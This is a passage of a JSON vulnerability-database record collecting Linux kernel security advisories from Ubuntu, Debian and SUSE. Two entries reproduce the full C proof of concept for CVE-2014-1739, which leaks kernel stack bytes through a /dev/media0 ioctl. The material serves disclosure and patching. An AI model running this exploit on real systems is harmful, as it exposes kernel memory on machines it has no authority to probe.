\nbypass). (CVE-2014-4655)\n\nAn integer overflow flaw was discovered in the control implementation of \nthe Advanced Linux Sound Architecture (ALSA). A local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2014-4656)\n\nAn integer underflow flaw was discovered in the Linux kernel's handling of \nthe backlog value for certain SCTP packets. A remote attacker could exploit \nthis flaw to cause a denial of service (socket outage) via a crafted SCTP \npacket. (CVE-2014-4667)\n\nVasily Averin discover a reference count flaw during attempts to umount in \nconjunction with a symlink. A local user could exploit this flaw to cause a \ndenial of service (memory consumption or use after free) or possibly have \nother unspecified impact. (CVE-2014-5045)", "edition": 69, "modified": "2014-09-02T00:00:00", "published": "2014-09-02T00:00:00", "id": "USN-2336-1", "href": "https://ubuntu.com/security/notices/USN-2336-1", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-15T13:44:51", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0155", "CVE-2014-4655", "CVE-2014-4508", "CVE-2014-0206", "CVE-2014-4653", "CVE-2014-4171", "CVE-2014-4014", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-0181", "CVE-2014-4652", "CVE-2014-4667"], "description": "A flaw was discovered in the Linux kernel virtual machine's (kvm) \nvalidation of interrupt requests (irq). A guest OS user could exploit this \nflaw to cause a denial of service (host OS crash). (CVE-2014-0155)\n\nAndy Lutomirski discovered a flaw in the authorization of netlink socket \noperations when a socket is passed to a process of more privilege. A local \nuser could exploit this flaw to bypass access restrictions by having a \nprivileged executable do something it was not intended to do. \n(CVE-2014-0181)\n\nAn information leak was discovered in the Linux kernels \naio_read_events_ring function. A local user could exploit this flaw to \nobtain potentially sensitive information from kernel memory. \n(CVE-2014-0206)\n\nA flaw was discovered in the Linux kernel's implementation of user \nnamespaces with respect to inode permissions. A local user could exploit \nthis flaw by creating a user namespace to gain administrative privileges. \n(CVE-2014-4014)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI \ntarget subsystem in the Linux kernel. A local user could exploit this flaw \nto obtain sensitive information from ramdisk_mcp memory by leveraging \naccess to a SCSI initiator. (CVE-2014-4027)\n\nSasha Levin reported an issue with the Linux kernel's shared memory \nsubsystem when used with range notifications and hole punching. A local \nuser could exploit this flaw to cause a denial of service. (CVE-2014-4171)\n\nToralf F\u00f6rster reported an error in the Linux kernels syscall auditing on \n32 bit x86 platforms. A local user could exploit this flaw to cause a \ndenial of service (OOPS and system crash). (CVE-2014-4508)\n\nAn information leak was discovered in the control implemenation of the \nAdvanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel. A \nlocal user could exploit this flaw to obtain sensitive information from \nkernel memory. (CVE-2014-4652)\n\nA use-after-free flaw was discovered in the Advanced Linux Sound \nArchitecture (ALSA) control implementation of the Linux kernel. A local \nuser could exploit this flaw to cause a denial of service (system crash). \n(CVE-2014-4653)\n\nA authorization bug was discovered with the snd_ctl_elem_add function of \nthe Advanced Linux Sound Architecture (ALSA) in the Linux kernel. A local \nuser could exploit his bug to cause a denial of service (remove kernel \ncontrols). (CVE-2014-4654)\n\nA flaw discovered in how the snd_ctl_elem function of the Advanced Linux \nSound Architecture (ALSA) handled a reference count. A local user could \nexploit this flaw to cause a denial of service (integer overflow and limit \nbypass). (CVE-2014-4655)\n\nAn integer overflow flaw was discovered in the control implementation of \nthe Advanced Linux Sound Architecture (ALSA). A local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2014-4656)\n\nAn integer underflow flaw was discovered in the Linux kernel's handling of \nthe backlog value for certain SCTP packets. A remote attacker could exploit \nthis flaw to cause a denial of service (socket outage) via a crafted SCTP \npacket. (CVE-2014-4667)\n\nVasily Averin discover a reference count flaw during attempts to umount in \nconjunction with a symlink. A local user could exploit this flaw to cause a \ndenial of service (memory consumption or use after free) or possibly have \nother unspecified impact. (CVE-2014-5045)", "edition": 69, "modified": "2014-09-02T00:00:00", "published": "2014-09-02T00:00:00", "id": "USN-2337-1", "href": "https://ubuntu.com/security/notices/USN-2337-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure", "edition": 1, "published": "2014-05-28T00:00:00", "title": "Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1739"], "modified": "2014-05-28T00:00:00", "id": "EXPLOITPACK:448F0B0D44522EA4F8F2133CF21B41E4", "href": "", "sourceData": "/*\nsource: https://www.securityfocus.com/bid/68048/info\n\nThe Linux kernel is prone to a local information-disclosure vulnerability.\n\nLocal attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.\n\nLinux kernel 2.6.38 through 3.15-rc2 are vulnerable. \n*/\n\n/*\n * $File: media-enum-poc.c\n * $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32.\n * $Author: Salva Peir\u00f3 <speirofr@gmail.com> (c) Copyright 2014.\n * $URL: http://speirofr.appspot.com/files/media-enum-poc.c\n * $License: GPLv2.\n */\n\n#include <stdio.h>\n#include <fcntl.h>\n#include <string.h>\n#include <stdint.h>\n\n#include <sys/ioctl.h>\n#include <linux/media.h>\n#define MEDIA_DEV \"/dev/media0\"\n\nint main(int argc, char *argv[])\n{\n struct media_entity_desc u_ent = {};\n char *file = MEDIA_DEV;\n int i, fd, ret;\n\n if (argc > 1)\n file = argv[1];\n fd = open(file, O_RDONLY);\n if (fd < 0){\n perror(\"open \" MEDIA_DEV);\n return -1;\n }\n\n u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;\n ret=ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent);\n if (ret < 0){\n perror(\"ioctl \" MEDIA_DEV);\n return -1;\n }\n\n printf(\"[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %d kstack bytes:\", sizeof(u_ent.reserved) + sizeof(u_ent.raw));\n for (i = 0; i < 200/sizeof(uint32_t); i++) {\n uint32_t data = *(uint32_t*)((uint32_t*)&u_ent.reserved+i);\n if (i % 4 == 0)\n printf(\"\\n %08d: \", i);\n printf(\"0x%08x \", data);\n }\n printf(\"\\n\");\n\n return ret;\n}\n\n/*\n gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T09:43:35", "description": "Linux Kernel 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability. CVE-2014-1739. Local exploit for linux platform", "published": "2014-05-28T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1739"], "modified": "2014-05-28T00:00:00", "id": "EDB-ID:39214", "href": "https://www.exploit-db.com/exploits/39214/", "sourceData": "source: http://www.securityfocus.com/bid/68048/info\r\n\r\nThe Linux kernel is prone to a local information-disclosure vulnerability.\r\n\r\nLocal attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.\r\n\r\nLinux kernel 2.6.38 through 3.15-rc2 are vulnerable. \r\n\r\n/*\r\n * $File: media-enum-poc.c\r\n * $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32.\r\n * $Author: Salva Peir\u0e23\u0e13 <speirofr@gmail.com> (c) Copyright 2014.\r\n * $URL: http://speirofr.appspot.com/files/media-enum-poc.c\r\n * $License: GPLv2.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n\r\n#include <sys/ioctl.h>\r\n#include <linux/media.h>\r\n#define MEDIA_DEV \"/dev/media0\"\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct media_entity_desc u_ent = {};\r\n char *file = MEDIA_DEV;\r\n int i, fd, ret;\r\n\r\n if (argc > 1)\r\n file = argv[1];\r\n fd = open(file, O_RDONLY);\r\n if (fd < 0){\r\n perror(\"open \" MEDIA_DEV);\r\n return -1;\r\n }\r\n\r\n u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;\r\n ret=ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent);\r\n if (ret < 0){\r\n perror(\"ioctl \" MEDIA_DEV);\r\n return -1;\r\n }\r\n\r\n printf(\"[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %d kstack bytes:\", sizeof(u_ent.reserved) + sizeof(u_ent.raw));\r\n for (i = 0; i < 200/sizeof(uint32_t); i++) {\r\n uint32_t data = *(uint32_t*)((uint32_t*)&u_ent.reserved+i);\r\n if (i % 4 == 0)\r\n printf(\"\\n %08d: \", i);\r\n printf(\"0x%08x \", data);\r\n }\r\n printf(\"\\n\");\r\n\r\n return ret;\r\n}\r\n\r\n/*\r\n gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */\r\n", "cvss": {"score": 1.7, "vector": "AV:LOCAL/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/39214/"}], "debian": [{"lastseen": "2020-11-11T13:19:57", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3688", "CVE-2014-7841", "CVE-2014-8709", "CVE-2014-3185", "CVE-2014-8884", "CVE-2014-6410", "CVE-2014-3687"], "description": "Package : linux-2.6\nVersion : 2.6.32-48squeeze10\nCVE ID : CVE-2014-3185 CVE-2014-3687 CVE-2014-3688 CVE-2014-6410\n CVE-2014-7841 CVE-2014-8709 CVE-2014-8884\n\nNon-maintainer upload by the Squeeze LTS and Kernel Teams.\n\nNew upstream stable release 2.6.32.65, see\nhttp://lkml.org/lkml/2014/12/13/81 for more information.\n\nThe stable release 2.6.32.65 includes the following new commits compared\nto the previous 2.6.32-48squeeze9 package:\n\n - USB: whiteheat: Added bounds checking for bulk command response\n (CVE-2014-3185)\n - net: sctp: fix panic on duplicate ASCONF chunks (CVE-2014-3687)\n - net: sctp: fix remote memory pressure from excessive queueing\n (CVE-2014-3688)\n - udf: Avoid infinite loop when processing indirect ICBs (CVE-2014-6410)\n - net: sctp: fix NULL pointer dereference in af->from_addr_param on\n malformed packet (CVE-2014-7841)\n - mac80211: fix fragmentation code, particularly for encryption\n (CVE-2014-8709)\n - ttusb-dec: buffer overflow in ioctl (CVE-2014-8884)\n\nWe recommend that you upgrade your linux-2.6 packages.\n\n\n\nWe apologize for a minor cosmetic glitch:\n\nThe following commits were already included in 2.6.32-48squeeze9 despite\nclaims in debian/changelog they were only fixed in 2.6.32-48squeez10:\n\n - vlan: Don't propagate flag changes on down interfaces.\n - sctp: Fix double-free introduced by bad backport in 2.6.32.62\n - md/raid6: Fix misapplied backport in 2.6.32.64\n - block: add missing blk_queue_dead() checks\n - block: Fix blk_execute_rq_nowait() dead queue handling\n - proc connector: Delete spurious memset in proc_exit_connector()\n", "edition": 7, "modified": "2014-12-21T17:46:09", "published": "2014-12-21T17:46:09", "id": "DEBIAN:DLA-118-1:98410", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201412/msg00020.html", "title": "[SECURITY] [DLA 118-1] linux-2.6 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:08:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-1739", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-4027", "CVE-2013-1979", "CVE-2014-3153", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-4667", "CVE-2014-2706"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel has been updated to fix\n various bugs and security issues.\n\n The following security bugs have been fixed:\n\n *\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to\n obtain sensitive information from kernel memory by leveraging\n /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call\n (bnc#882804).\n\n *\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does\n not properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n *\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel\n through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled\n and the sep CPU feature flag is set, allows local users to cause a denial\n of service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n *\n\n CVE-2014-4667: The sctp_association_free function in\n net/sctp/associola.c in the Linux kernel before 3.15.2 does not properly\n manage a certain backlog value, which allows remote attackers to cause a\n denial of service (socket outage) via a crafted SCTP packet (bnc#885422).\n\n *\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\n Linux kernel through 3.15.6 allows local users to gain privileges by\n leveraging data-structure differences between an l2tp socket and an inet\n socket (bnc#887082).\n\n *\n\n CVE-2014-5077: The sctp_assoc_update function in\n net/sctp/associola.c in the Linux kernel through 3.15.8, when SCTP\n authentication is enabled, allows remote attackers to cause a denial of\n service (NULL pointer dereference and OOPS) by starting to establish an\n association between two endpoints immediately after an exchange of INIT\n and INIT ACK chunks to establish an earlier association between these\n endpoints in the opposite direction (bnc#889173).\n\n *\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n *\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n *\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n *\n\n CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n *\n\n CVE-2014-3153 The futex_requeue function in kernel/futex.c in the\n Linux kernel through 3.14.5 does not ensure that calls have two different\n futex addresses, which allows local users to gain privileges via a crafted\n FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n (bnc#880892)\n\n *\n\n CVE-2014-6410: Avoid infinite loop when processing indirect ICBs\n (bnc#896689)\n\n The following non-security bugs have been fixed:\n\n * ACPI / PAD: call schedule() when need_resched() is true (bnc#866911).\n * ACPI: Fix bug when ACPI reset register is implemented in system\n memory (bnc#882900).\n * ACPI: Limit access to custom_method (bnc#884333).\n * ALSA: hda - Enabling Realtek ALC 671 codec (bnc#891746).\n * Add option to automatically enforce module signatures when in Secure\n Boot mode (bnc#884333).\n * Add secure_modules() call (bnc#884333).\n * Add wait_on_atomic_t() and wake_up_atomic_t() (bnc#880344).\n * Backported new patches of Lock down functions for UEFI secure boot\n Also updated series.conf and removed old patches.\n * Btrfs: Return EXDEV for cross file system snapshot.\n * Btrfs: abort the transaction when we does not find our extent ref.\n * Btrfs: avoid warning bomb of btrfs_invalidate_inodes.\n * Btrfs: cancel scrub on transaction abortion.\n * Btrfs: correctly set profile flags on seqlock retry.\n * Btrfs: does not check nodes for extent items.\n * Btrfs: fix a possible deadlock between scrub and transaction\n committing.\n * Btrfs: fix corruption after write/fsync failure + fsync + log\n recovery (bnc#894200).\n * Btrfs: fix csum tree corruption, duplicate and outdated checksums\n (bnc#891619).\n * Btrfs: fix double free in find_lock_delalloc_range.\n * Btrfs: fix possible memory leak in btrfs_create_tree().\n * Btrfs: fix use of uninit "ret" in end_extent_writepage().\n * Btrfs: free delayed node outside of root->inode_lock (bnc#866864).\n * Btrfs: make DEV_INFO ioctl available to anyone.\n * Btrfs: make FS_INFO ioctl available to anyone.\n * Btrfs: make device scan less noisy.\n * Btrfs: make sure there are not any read requests before stopping\n workers.\n * Btrfs: more efficient io tree navigation on wait_extent_bit.\n * Btrfs: output warning instead of error when loading free space cache\n failed.\n * Btrfs: retrieve more info from FS_INFO ioctl.\n * Btrfs: return EPERM when deleting a default subvolume (bnc#869934).\n * Btrfs: unset DCACHE_DISCONNECTED when mounting default subvol\n (bnc#866615).\n * Btrfs: use right type to get real comparison.\n * Btrfs: wake up @scrub_pause_wait as much as we can.\n * Btrfs: wake up transaction thread upon remount.\n * CacheFiles: Add missing retrieval completions (bnc#880344).\n * CacheFiles: Does not try to dump the index key if the cookie has\n been cleared (bnc#880344).\n * CacheFiles: Downgrade the requirements passed to the allocator\n (bnc#880344).\n * CacheFiles: Fix the marking of cached pages (bnc#880344).\n * CacheFiles: Implement invalidation (bnc#880344).\n * CacheFiles: Make some debugging statements conditional (bnc#880344).\n * Drivers: hv: util: Fix a bug in the KVP code (bnc#886840).\n * Drivers: hv: vmbus: Fix a bug in the channel callback dispatch code\n (bnc#886840).\n * FS-Cache: Add transition to handle invalidate immediately after\n lookup (bnc#880344).\n * FS-Cache: Check that there are no read ops when cookie relinquished\n (bnc#880344).\n * FS-Cache: Clear remaining page count on retrieval cancellation\n (bnc#880344).\n * FS-Cache: Convert the object event ID #defines into an enum\n (bnc#880344).\n * FS-Cache: Does not sleep in page release if __GFP_FS is not set\n (bnc#880344).\n * FS-Cache: Does not use spin_is_locked() in assertions (bnc#880344).\n * FS-Cache: Exclusive op submission can BUG if there is been an I/O\n error (bnc#880344).\n * FS-Cache: Fix __wait_on_atomic_t() to call the action func if the\n counter != 0 (bnc#880344).\n * FS-Cache: Fix object state machine to have separate work and wait\n states (bnc#880344).\n * FS-Cache: Fix operation state management and accounting (bnc#880344).\n * FS-Cache: Fix signal handling during waits (bnc#880344).\n * FS-Cache: Initialise the object event mask with the calculated mask\n (bnc#880344).\n * FS-Cache: Limit the number of I/O error reports for a cache\n (bnc#880344).\n * FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344).\n * FS-Cache: Mark cancellation of in-progress operation (bnc#880344).\n * FS-Cache: One of the write operation paths doeses not set the object\n state (bnc#880344).\n * FS-Cache: Provide proper invalidation (bnc#880344).\n * FS-Cache: Simplify cookie retention for fscache_objects, fixing oops\n (bnc#880344).\n * FS-Cache: The retrieval remaining-pages counter needs to be atomic_t\n (bnc#880344).\n * FS-Cache: Uninline fscache_object_init() (bnc#880344).\n * FS-Cache: Wrap checks on object state (bnc#880344).\n * HID: usbhid: add always-poll quirk (bnc#888607).\n * HID: usbhid: enable always-poll quirk for Elan Touchscreen\n (bnc#888607).\n * IB/iser: Add TIMEWAIT_EXIT event handling (bnc#890297).\n * Ignore "flags" change to event_constraint (bnc#876114).\n * Ignore data_src/weight changes to perf_sample_data (bnc#876114).\n * NFS: Allow more operations in an NFSv4.1 request (bnc#890513).\n * NFS: Clean up helper function nfs4_select_rw_stateid() (bnc#888968).\n * NFS: Does not copy read delegation stateids in setattr (bnc#888968).\n * NFS: Does not use a delegation to open a file when returning that\n delegation (bnc#888968, bnc#892200, bnc#893596, bnc#893496)\n * NFS: Fixes for NFS RCU-walk support in line with code going upstream\n * NFS: Use FS-Cache invalidation (bnc#880344).\n * NFS: allow lockless access to access_cache (bnc#866130).\n * NFS: avoid mountpoint being displayed as " (deleted)" in\n /proc/mounts (bnc#888591).\n * NFS: nfs4_do_open should add negative results to the dcache\n (bnc#866130).\n * NFS: nfs_migrate_page() does not wait for FS-Cache to finish with a\n page (bnc#880344).\n * NFS: nfs_open_revalidate: only evaluate parent if it will be used\n (bnc#866130).\n * NFS: prepare for RCU-walk support but pushing tests later in code\n (bnc#866130).\n * NFS: support RCU_WALK in nfs_permission() (bnc#866130).\n * NFS: teach nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130).\n * NFS: teach nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130).\n * NFSD: Does not hand out delegations for 30 seconds after recalling\n them (bnc#880370).\n * NFSv4 set open access operation call flag in nfs4_init_opendata_res\n (bnc#888968, bnc#892200, bnc#893596, bnc#893496).\n * NFSv4: Add a helper for encoding opaque data (bnc#888968).\n * NFSv4: Add a helper for encoding stateids (bnc#888968).\n * NFSv4: Add helpers for basic copying of stateids (bnc#888968).\n * NFSv4: Clean up nfs4_select_rw_stateid() (bnc#888968).\n * NFSv4: Fix the return value of nfs4_select_rw_stateid (bnc#888968).\n * NFSv4: Rename nfs4_copy_stateid() (bnc#888968).\n * NFSv4: Resend the READ/WRITE RPC call if a stateid change causes an\n error (bnc#888968).\n * NFSv4: Simplify the struct nfs4_stateid (bnc#888968).\n * NFSv4: The stateid must remain the same for replayed RPC calls\n (bnc#888968).\n * NFSv4: nfs4_stateid_is_current should return "true" for an invalid\n stateid (bnc#888968).\n * One more fix for kABI breakage.\n * PCI: Lock down BAR access when module security is enabled\n (bnc#884333).\n * PCI: enable MPS "performance" setting to properly handle bridge MPS\n (bnc#883376).\n * PM / Hibernate: Add memory_rtree_find_bit function (bnc#860441).\n * PM / Hibernate: Create a Radix-Tree to store memory bitmap\n (bnc#860441).\n * PM / Hibernate: Implement position keeping in radix tree\n (bnc#860441).\n * PM / Hibernate: Iterate over set bits instead of PFNs in\n swsusp_free() (bnc#860441).\n * PM / Hibernate: Remove the old memory-bitmap implementation\n (bnc#860441).\n * PM / Hibernate: Touch Soft Lockup Watchdog in rtree_next_node\n (bnc#860441).\n * Restrict /dev/mem and /dev/kmem when module loading is restricted\n (bnc#884333).\n * Reuse existing "state" field to indicate PERF_X86_EVENT_PEBS_LDLAT\n (bnc#876114).\n * USB: handle LPM errors during device suspend correctly (bnc#849123).\n * Update kabi files to reflect fscache change (bnc#880344)\n * Update x86_64 config files: re-enable SENSORS_W83627EHF (bnc#891281)\n * VFS: Make more complete truncate operation available to CacheFiles\n (bnc#880344).\n * [FEAT NET1222] ib_uverbs: Allow explicit mmio trigger (FATE#83366,\n ltc#83367).\n * acpi: Ignore acpi_rsdp kernel parameter when module loading is\n restricted (bnc#884333).\n * af_iucv: correct cleanup if listen backlog is full (bnc#885262,\n LTC#111728).\n * asus-wmi: Restrict debugfs interface when module loading is\n restricted (bnc#884333).\n * autofs4: allow RCU-walk to walk through autofs4 (bnc#866130).\n * autofs4: avoid taking fs_lock during rcu-walk (bnc#866130).\n * autofs4: does not take spinlock when not needed in\n autofs4_lookup_expiring (bnc#866130).\n * autofs4: factor should_expire() out of autofs4_expire_indirect\n (bnc#866130).\n * autofs4: make "autofs4_can_expire" idempotent (bnc#866130).\n * autofs4: remove a redundant assignment (bnc#866130).\n * autofs: fix lockref lookup (bnc#888591).\n * be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759).\n * block: add cond_resched() to potentially long running ioctl discard\n loop (bnc#884725).\n * block: fix race between request completion and timeout handling\n (bnc#881051).\n * cdc-ether: clean packet filter upon probe (bnc#876017).\n * cpuset: Fix memory allocator deadlock (bnc#876590).\n * crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not all archs\n have them, but some are FIPS certified, with some kernel support.\n * crypto: fips - only panic on bad/missing crypto mod signatures\n (bnc#887503).\n * crypto: testmgr - allow aesni-intel and ghash_clmulni-intel in fips\n mode (bnc#889451).\n * dasd: validate request size before building CCW/TCW (bnc#891087,\n LTC#114068).\n * dm mpath: fix race condition between multipath_dtr and pg_init_done\n (bnc#826486).\n * dm-mpath: fix panic on deleting sg device (bnc#870161).\n * drm/ast: AST2000 cannot be detected correctly (bnc#895983).\n * drm/ast: Actually load DP501 firmware when required (bnc#895608\n bnc#871134).\n * drm/ast: Add missing entry to dclk_table[].\n * drm/ast: Add reduced non reduced mode parsing for wide screen mode\n (bnc#892723).\n * drm/ast: initial DP501 support (v0.2) (bnc#871134).\n * drm/ast: open key before detect chips (bnc#895983).\n * drm/i915: Fix up cpt pixel multiplier enable sequence (bnc#879304).\n * drm/i915: Only apply DPMS to the encoder if enabled (bnc#893064).\n * drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at driver init\n (bnc#869055).\n * drm/i915: create functions for the "unclaimed register" checks\n (bnc#869055).\n * drm/i915: use FPGA_DBG for the "unclaimed register" checks\n (bnc#869055).\n * drm/mgag200: Initialize data needed to map fbdev memory (bnc\n #806990).\n * e1000e: enable support for new device IDs (bnc#885509).\n * fs/fscache: remove spin_lock() from the condition in while()\n (bnc#880344).\n * hibernate: Disable in a signed modules environment (bnc#884333).\n * hugetlb: does not use ERR_PTR with VM_FAULT* values\n * ibmvscsi: Abort init sequence during error recovery (bnc#885382).\n * ibmvscsi: Add memory barriers for send / receive (bnc#885382).\n * inet: add a redirect generation id in inetpeer (bnc#860593).\n * inetpeer: initialize ->redirect_genid in inet_getpeer() (bnc#860593).\n * ipv6: tcp: fix tcp_v6_conn_request() (bnc#887645).\n * kabi: hide bnc#860593 changes of struct inetpeer_addr_base\n (bnc#860593).\n * kernel: 3215 tty hang (bnc#891087, LTC#114562).\n * kernel: fix data corruption when reading /proc/sysinfo (bnc#891087,\n LTC#114480).\n * kernel: fix kernel oops with load of fpc register (bnc#889061,\n LTC#113596).\n * kernel: sclp console tty reference counting (bnc#891087, LTC#115466).\n * kexec: Disable at runtime if the kernel enforces module loading\n restrictions (bnc#884333).\n * md/raid6: avoid data corruption during recovery of double-degraded\n RAID6.\n * memcg, vmscan: Fix forced scan of anonymous pages (memory reclaim\n fix).\n * memcg: do not expose uninitialized mem_cgroup_per_node to world\n (bnc#883096).\n * mm, hugetlb: add VM_NORESERVE check in vma_has_reserves()\n * mm, hugetlb: change variable name reservations to resv\n * mm, hugetlb: decrement reserve count if VM_NORESERVE alloc page cache\n * mm, hugetlb: defer freeing pages when gathering surplus pages\n * mm, hugetlb: do not use a page in page cache for cow optimization\n * mm, hugetlb: fix and clean-up node iteration code to alloc or free\n * mm, hugetlb: fix race in region tracking\n * mm, hugetlb: fix subpool accounting handling\n * mm, hugetlb: improve page-fault scalability\n * mm, hugetlb: improve, cleanup resv_map parameters\n * mm, hugetlb: move up the code which check availability of free huge\n page\n * mm, hugetlb: protect reserved pages when soft offlining a hugepage\n * mm, hugetlb: remove decrement_hugepage_resv_vma()\n * mm, hugetlb: remove redundant list_empty check in\n gather_surplus_pages()\n * mm, hugetlb: remove resv_map_put\n * mm, hugetlb: remove useless check about mapping type\n * mm, hugetlb: return a reserved page to a reserved pool if failed\n * mm, hugetlb: trivial commenting fix\n * mm, hugetlb: unify region structure handling\n * mm, hugetlb: unify region structure handling kabi\n * mm, hugetlb: use long vars instead of int in region_count() (Hugetlb\n Fault Scalability).\n * mm, hugetlb: use vma_resv_map() map types\n * mm, oom: fix badness score underflow (bnc#884582, bnc#884767).\n * mm, oom: normalize oom scores to oom_score_adj scale only for\n userspace (bnc#884582, bnc#884767).\n * mm, thp: do not allow thp faults to avoid cpuset restrictions\n (bnc#888849).\n * net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680).\n * net/mlx4_core: Load the IB driver when the device supports IBoE\n (bnc#887680).\n * net/mlx4_en: Fix a race between napi poll function and RX ring\n cleanup (bnc#863586).\n * net/mlx4_en: Fix selftest failing on non 10G link speed (bnc#888058).\n * net: fix checksumming features handling in output path (bnc#891259).\n * pagecache_limit: batch large nr_to_scan targets (bnc#895221).\n * pagecachelimit: reduce lru_lock congestion for heavy parallel\n reclaim fix (bnc#895680).\n * perf/core: Add weighted samples (bnc#876114).\n * perf/x86: Add flags to event constraints (bnc#876114).\n * perf/x86: Add memory profiling via PEBS Load Latency (bnc#876114).\n * perf: Add generic memory sampling interface (bnc#876114).\n * qla2xxx: Avoid escalating the SCSI error handler if the command is\n not found in firmware (bnc#859840).\n * qla2xxx: Clear loop_id for ports that are marked lost during fabric\n scanning (bnc#859840).\n * qla2xxx: Does not check for firmware hung during the reset context\n for ISP82XX (bnc#859840).\n * qla2xxx: Issue abort command for outstanding commands during cleanup\n when only firmware is alive (bnc#859840).\n * qla2xxx: Reduce the time we wait for a command to complete during\n SCSI error handling (bnc#859840).\n * qla2xxx: Set host can_queue value based on available resources\n (bnc#859840).\n * restore smp_mb() in unlock_new_inode() (bnc#890526).\n * s390/pci: introduce lazy IOTLB flushing for DMA unmap (bnc#889061,\n LTC#113725).\n * sched: fix the theoretical signal_wake_up() vs schedule() race\n (bnc#876055).\n * sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035).\n * scsi_dh: use missing accessor "scsi_device_from_queue" (bnc#889614).\n * scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail (bnc#887608).\n * scsiback: correct grant page unmapping.\n * scsiback: fix retry handling in __report_luns().\n * scsiback: free resources after error.\n * sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130).\n * supported.conf: remove external from drivers/net/veth (bnc#889727)\n * supported.conf: support 